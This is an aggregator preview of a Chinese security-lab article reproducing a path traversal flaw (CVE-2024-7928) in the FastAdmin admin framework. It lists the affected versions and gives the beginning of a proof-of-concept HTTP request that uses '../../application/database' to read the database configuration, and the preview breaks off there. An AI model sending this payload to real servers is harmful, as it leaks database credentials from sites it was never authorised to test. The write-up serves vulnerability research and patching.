专栏名称: 弥天安全实验室
弥天安全实验室,需要您的支持!
今天看啥  ›  专栏  ›  弥天安全实验室

【成功复现】FastAdmin路径遍历漏洞(CVE-2024-7928)

弥天安全实验室  · 公众号  ·  · 2024-10-09 18:45
    

文章预览

网安引领时代,弥天点亮未来       0x00写在前面       本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责! 0x01漏洞介绍 FastAdmin是Karson个人开发者的一套基于ThinkPHP和Bootstrap的网站后台开发框架。 它基于ThinkPHP和Bootstrap两大主流技术构建,拥有完善的权限管理系统和一键生成CRUD等强大功能。FastAdmin致力于提高开发效率,降低开发成本,同时确保后台系统的稳定性和安全性。 FastAdmin 1.3.4.20220530之前版本存在路径遍历漏洞,该漏洞源于存在任意文件读取漏洞,攻击者利用此漏洞可以获取系统敏感信息。 0x02影响版本 影响产品及版本 FastAdmin 1.3.4.20220530之前版本 0x03漏洞复现 1.访问漏洞环境 2.对漏洞进行复现   POC  漏洞复现 GET /index/ajax/lang?lang=../../application/database HTTP/1.1 Host: 127.0.0.1 User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64 ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览